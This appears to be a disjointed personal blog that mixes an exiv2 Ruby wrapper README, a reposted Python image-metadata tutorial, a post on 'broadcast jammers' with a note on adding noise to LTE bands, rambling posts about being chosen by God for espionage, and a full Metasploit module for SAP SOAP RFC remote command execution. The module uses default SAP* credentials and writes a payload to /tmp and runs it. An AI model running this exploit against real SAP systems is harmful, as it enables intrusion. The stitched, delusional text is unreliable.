Tuesday, May 15, 2018

CODE IS ...

....A simple wrapper around exiv2...
A simple wrapper around the C++ Exiv2 libary for reading and writing image metadata.
Requires that the exiv2 C++ library is installed.

Usage

gem install exiv2
if you get errors with header could not be found below:
exiv2.cpp:1:10: fatal error: 'exiv2/image.hpp' file not found
#include "exiv2/image.hpp"
please explicitly declare the header path
gem install exiv2 -- --with-exiv2-include="${EXIV2_PREFIX}/include" --with-exiv2-lib="${EXIV2_PREFIX}/lib"
on OSX with Homebrew's exiv2, the EXIV2_PREFIX can be set:
export EXIV2_PREFIX=$(brew --prefix exiv2)
If you get this error while trying to install as part of a bundle install, you can set these paths using:
bundle config build.exiv2 --with-exiv2-include="${EXIV2_PREFIX}/include" --with-exiv2-lib="${EXIV2_PREFIX}/lib"
If you are on new version of Command Line Tool (that is newer than 6.2, and bump into following error:
/Library/Developer/CommandLineTools/usr/bin/../include/c++/v1/iterator:341:10: fatal error: '__debug' file not found
#include <__debug>
You can follow the quick hack by touching a new file /Library/Developer/CommandLineTools/usr/include/c++/v1/__debug with content:
#ifndef _LIBCPP_ASSERT
#define _LIBCPP_ASSERT(...) ((void)0)
#endif
Once everything is successfully installed, you can give it a go:
require 'exiv2'
image = Exiv2::ImageFactory.open("image.jpg")
image.read_metadata
image.iptc_data.each do |key, value|
  puts "#{key} = #{value}\n"
end
image.exif_data.each { ... }
image.xmp_data.each { ... }

iptc_data_hash  = image.iptc_data.to_hash
xmp_data_hash   = image.xmp_data.to_hash

image.exif_data.delete("Exif.Image.Software")
image.iptc_data.delete_all("Iptc.Application2.Keywords")

image.iptc_data["Iptc.Application2.Caption"] = "A New Caption"
image.iptc_data.add("Iptc.Application2.Keywords", "fishy")

image.write_metadata




envato/exiv2
A simple wrapper around exiv2
GITHUB.COM

at No comments:
welcome back...to war! "Not that I'm currently cruising for jobs with British intelligence or anything, but I happened upon (via Hacker News) this current coding challenge posted to the MI5 careers page...."
Prerequisites: Assuming you've already downloaded and installed Python, you should do two things. One: spend 10 minutes doing this "Hello, World" Python for non-programmers tutorial. Two: spend another five minutes doing this tutorial on using Python modules

0.0) Install Pillow

The active version of PIL is actually known as Pillow, so this is what we need to install. You should do this with the Python package manager pip, which is covered in the second prerequisite tutorial above. Just:
pip install pillow
Now, create a new Python script in whatever text editor you like. I'm using Sublime Text, which is great. I called my script metaread.py.

1.0) Create an Image object

First thing we're going to do is actually bring in the Pillow module we installed, which is the first line below. Next, we need to create an object representation of our MI5 image, puzzle.png. This exposes the image and all of the things we can do with it via the Pillow module to our Python script. To see some more of these capabilities, check out Hack This: Edit an Image in Python.
from PIL import Image image = Image.open("water.png")

2.0) Extract the Exif data

Not all image formats contain Exif data. Mostly just JPGs. Which is fine because that's most pictures. The MI5's image is actually a .PNG file, which we'll have to handle somewhat differently. Let's do a quick JPG though.
There's really nothing to it. I create the image object as above then call the _getexif()function on it. In return, I get a dictionary data structure full of metadata.
The dictionary consists of tag-value pairs, which we can extract and view using a for-loop, like this. Note that I had to import some extra stuff at the top:
from PIL import Image from PIL.ExifTags import TAGS, GPSTAGS image = Image.open("gpsample.jpg") print(image) info = image._getexif() for tag, value in info.items(): key = TAGS.get(tag, tag) print(key + " " + str(value))
So, that just outputs all of the Exif data contained within a given image as a series of entries. It's hardly guaranteed to be the same for every image. I had to search online for a sample image containing GPS metadata because I got tired of scanning through everything on my computer trying to find an example (though it wouldn't be too hard to write a script that could comb through a file of images and automatically pull out those that do include it). In any case, you can find the same image here.
A sampling of the output:
GPSInfo {0: '\x00\x00\x02\x02', 1: u'S', 2: ((33, 1), (51, 1), (2191, 100)), 3: u'E', 4: ((151, 1), (13, 1), (1173, 100)), 5: '\x00', 6: (0, 1)} ISOSpeedRatings 100 ResolutionUnit 2 WhiteBalance 0 GainControl 0 BrightnessValue (100, 10)

2.1) Extract non-Exif data

Again, PNGs don't come with Exif data.
Don't panic. Just because it's not in Exif format doesn't mean that puzzle.png's metadata is all that more difficult to access.
It so happens that when an image is loaded per step 1.0, the PIL module will automatically load up a dictionary with whatever metadata it can id. We can barf it all out to the screen with a simple print statement:
print (image.info)
Or we can loop through it as in 2.0 as such:
for tag, value in info.items(): key = TAGS.get(tag, tag) print(key + " " + str(value))
Problem solved?
So, at this point I need to confess that this .info method is not actually returning all of the metadata from puzzle.png, and I don't quite know why. In addition to regular old Photoshop and the ExifRead Python tool mentioned above, I also tried four different online metadata extraction tools and only one was able to return a complete listing: Jeffrey Friedl's Image Metadata Viewer. Said viewer is based on a command-line tool called ExifTool, which I downloaded and ran. It too worked.
But I promised Python and Python we shall write. It's actually pretty easy to run a command-line program from within Python, but you'll still have to download the actual command line program, which is available here. Now, we can run this script on our image file, and the ExifTool will output the result via Python to the screen. Try it.
import os os.system('exiftool -h puzzle.png')
See the clue?
I don't know why it was so difficult to pull metadata from this file. It may have something to do with how metadata in PNG files is laid out. Within the file, metadata is kept in data structures called chunks. Chunks are given weird coded names that define, among other things, whether they should be considered "critical" or not. Critical chunks include actual image data, bit depth, and color palette. Not-critical chunks offer histograms, gamma values, default background colors, and, finally, text. There are three different types of text chunks all with a standard dictionary entry format. Each text entry has a name or title, and then some associated text. They can be user-defined, but there are some text field types that come predefined, such as "comment." Which in our MI5 file contains this:
https://motherboard.vice.com/en_us/article/aekn58/hack-this-extra-image-metadata-using-python
Hack This: Extract Image Metadata Using Python
What secrets are your JPGs hiding?
MOTHERBOARD.VICE.COM

at No comments:

Monday, May 14, 2018

back to war! so...who wants completely secure communications, and probable tv broadcast jammers ?


http://www.goscas.com/china-high_power_ka_band_point_to_point_microwave_antennas_dual_polarization-5650098.html



High Power KA Band Point to Point Microwave Antennas Dual Polarization
Quality Ka band Tx/Rx Satellite Antenna manufacturers & exporter - buy High Power KA Band Point to Point…
GOSCAS.COM
Comentários
Elsa David starting another week, monday, 13.35 pm Standing NATO Maritime Group 1Gerir

Gosto
Responder7 min
Elsa David what's the philosophy ? "receive the LTE signals, filter band 3 and band 40, add noise and increase the amplitude of the signal"
at No comments:

At 4 am ...I explained to my tribe who am I ...what are my powers...all of my Prophets have powers, that God will reveal when the time comes

at No comments:

At 4 am ...I explained to my tribe who am I ...what are my powers...all of my Prophets have powers, that God will reveal when the time comes

at No comments:
Maybe I am semi Goddess ...I keep on saying to invisible Jesus my Lord, you better have a very special place for me in Paradise, since I'm being used by God, for some task and purpose I don't know what it is, and I'm not being payed!!!!! Maybe Jesus got my Mother pregnant, when she was for 3 years trying, picked my Mother specially for a truly Queen taste. And keep me here, using my rage, on a world that should have made me very very rich...keep me here poor and prisoner. Maybe Jesus architect this story, by making me, not a top model, but the most loved girl in the world...for a sexy look, that I had for years, (and still have) that its universal ; a sexy look, that Jesus carefully studied on Men's preferences....My natural talent for espionage...My gigant megalomania views. ...My realism ...my pure heart...my good intentions...and horrible revenges ....as we spoken , the phone ringed ...my Mother telling (us) the old men has a lottery in his pocket for me...didn't said how much or when he would give me...
we live in times, where computers are nano sized and can penetrate your skin. God has a task for me, for all my friends gather at my house. Jesus said.."if I told you , your actions in the future, you would change them" He downloaded me, tetra bytes of information...Jesus said to me what was our part, how the "war" will end...but He keeps the lottery ticket on His pocket, not saying how much and when He will give it to us.
at No comments:

Sunday, May 13, 2018

Some people # just seem to enjoy hacking SAP :) ...back to war! ...just wait for maintenance....

require 'msf/core'
 
class Metasploit4 < Msf::Exploit::Remote
 
  Rank = GreatRanking
 
  include Msf::Exploit::CmdStagerVBS
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::HttpClient
 
  def initialize
    super(
      'Name' => 'SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution',
      'Description' => %q{
          This module abuses the SAP NetWeaver SXPG_COMMAND_EXECUTE function, on the SAP
        SOAP RFC Service, to execute remote commands. This module needs SAP credentials with
        privileges to use the /sap/bc/soap/rfc in order to work. The module has been tested
        successfully on Windows 2008 64 bits and Linux 64 bits platforms.
      },
      'References' =>
        [
          [ 'URL', 'http://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection' ],
          [ 'URL', 'https://service.sap.com/sap/support/notes/1764994' ],
          [ 'URL', 'https://service.sap.com/sap/support/notes/1341333' ]
        ],
      'DisclosureDate' => 'May 8 2012',
      'Platform'       => ['win', 'unix'],
      'Targets' => [
        [ 'Linux',
          {
            'Arch'     => ARCH_CMD,
            'Platform' => 'unix'
            #'Payload'  =>
              #{
                #'DisableNops' => true,
                #'Space'       => 232,
                #'Compat'      =>
                  #{
                    #'PayloadType' => 'cmd',
                    #'RequiredCmd' => 'perl ruby',
                  #}
              #}
          }
        ],
        [ 'Windows x64',
          {
            'Arch' => ARCH_X86_64,
            'Platform' => 'win'
          }
        ]
      ],
      'DefaultTarget' => 0,
      'Privileged' => false,
      'Author' =>
        [
          'nmonkee'
        ],
      'License' => MSF_LICENSE
    )
    register_options(
      [
        Opt::RPORT(8000),
        OptString.new('CLIENT', [true, 'SAP Client', '001']),
        OptString.new('USERNAME', [true, 'Username', 'SAP*']),
        OptString.new('PASSWORD', [true, 'Password', '06071992'])
      ], self.class)
    register_advanced_options(
      [
        OptInt.new('PAYLOAD_SPLIT', [true, 'Size of payload segments (Windows Target)', 250]),
      ], self.class)
  end
 
  def send_soap_request(data)
    res = send_request_cgi({
      'uri' => '/sap/bc/soap/rfc',
      'method' => 'POST',
      'data' => data,
      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
      'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],
      'ctype' => 'text/xml; charset=UTF-8',
      'headers' => {
        'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',
      },
      'vars_get' => {
        'sap-client' => datastore['CLIENT'],
        'sap-language' => 'EN'
      }
    })
    return res
  end
 
  def build_soap_request(command, sap_command, sap_os)
    data = "\r\n"
    data << "http://www.w3.org/2001/XMLSchema
\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\r\n"
    data << "\r\n"
    data << "http://schemas.xmlsoap.org/soap/encoding/
\">\r\n"
    data << "#{command}\r\n"
    data << "#{sap_command}\r\n"
    data << "#{sap_os}\r\n"
    data << "\r\n"
    data << "
\r\n"
    data << "
\r\n"
    data << "
"
 
    return data
  end
 
  def check
    data = rand_text_alphanumeric(4 + rand(4))
    res = send_soap_request(data)
    if res and res.code == 500 and res.body =~ /faultstring/
      return Exploit::CheckCode::Detected
    end
    return Exploit::CheckCode::Safe
  end
 
  def exploit
    if target.name =~ /Windows/
      linemax = datastore['PAYLOAD_SPLIT']
      vprint_status("#{rhost}:#{rport} - Using custom payload size of #{linemax}") if linemax != 250
      print_status("#{rhost}:#{rport} - Sending SOAP SXPG_COMMAND_EXECUTE request")
      execute_cmdstager({ :delay => 0.35, :linemax => linemax })
    elsif target.name =~ /Linux/
      file = rand_text_alphanumeric(5)
      stage_one = create_unix_payload(1,file)
      print_status("#{rhost}:#{rport} - Dumping the payload to /tmp/#{file}...")
      res = send_soap_request(stage_one)
      if res and res.code == 200 and res.body =~ /External program terminated/
        print_good("#{rhost}:#{rport} - Payload dump was successful")
      else
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Payload dump failed")
      end
      stage_two = create_unix_payload(2,file)
      print_status("#{rhost}:#{rport} - Executing /tmp/#{file}...")
      send_soap_request(stage_two)
    end
  end
 
  def create_unix_payload(stage, file)
    command = ""
    if target.name =~ /Linux/
      if stage == 1
        my_payload = payload.encoded.gsub(" ","\t")
        my_payload.gsub!("&","&")
        my_payload.gsub!("<","<")
        command = "-o /tmp/" + file + " -n pwnie" + "\n!"
        command << my_payload
        command << "\n"
      elsif stage == 2
        command = "-ic /tmp/" + file
      end
 
    end
 
    return build_soap_request(command.to_s, "DBMCLI", "ANYOS")
  end
 
  def execute_command(cmd, opts)
    command = cmd.gsub(/&/, "&")
    command.gsub!(/%TEMP%\\/, "")
    data = build_soap_request("&#{command}", "LIST_DB2DUMP", "Windows NT")
    begin
      res = send_soap_request(data)
      if res and res.code == 200
        return
      else
        if res and res.body =~ /faultstring/
          error = res.body.scan(%r{(.*?)})
          0.upto(error.length-1) do |i|
            vprint_error("#{rhost}:#{rport} - Error #{error[i]}")
          end
        end
        print_status("#{res.code}\n#{res.body}")
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Error injecting command")
      end
    rescue ::Rex::ConnectionError
      fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Unable to connect")
    end
  end
end

https://www.exploit-db.com/exploits/25446/
at No comments:
Subscribe to: Posts (Atom)